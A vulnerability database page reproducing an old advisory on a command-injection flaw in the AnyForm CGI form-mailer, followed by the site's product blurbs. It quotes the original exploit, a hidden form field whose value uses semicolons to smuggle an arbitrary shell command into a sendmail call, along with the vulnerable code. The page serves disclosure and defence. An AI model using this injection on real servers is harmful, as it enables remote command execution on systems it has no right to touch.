Vulners
Lucene search
John S.2 Roberts AnyForm 1.0/2.0 - CGI Semicolon
source: https://www.securityfocus.com/bid/719/info
AnyForm is a popular form CGI designed to support simple forms that deliver responses via email. Certain versions of AnyForm did not perform user supplied data sanity checking and could be exploited by remote intruders to execute arbitrary commands. These commands were issued as the UID which the web server runs as, typically 'nobody'.
Exploit as taken from the original post on this issue:
To exploit, create a form with a hidden field something like this:
<input type="hidden" name="AnyFormTo" value="[email protected];command-to-execute
with whatever arguments;/usr/lib/sendmail -t [email protected] ">
Then submit the form to the "AnyForm" CGI on the server to be attacked.
The value of this parameter is passed to this code:
SystemCommand="/usr/lib/sendmail -t " + AnyFormTo + " <" + CombinedFileName;
system(SystemCommand);
Since system invokes a shell, the semicolons are treated as command
delimeters and anything can be insertedData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
31 Jul 1995 00:00Current
7.4High risk
Vulners AI Score7.4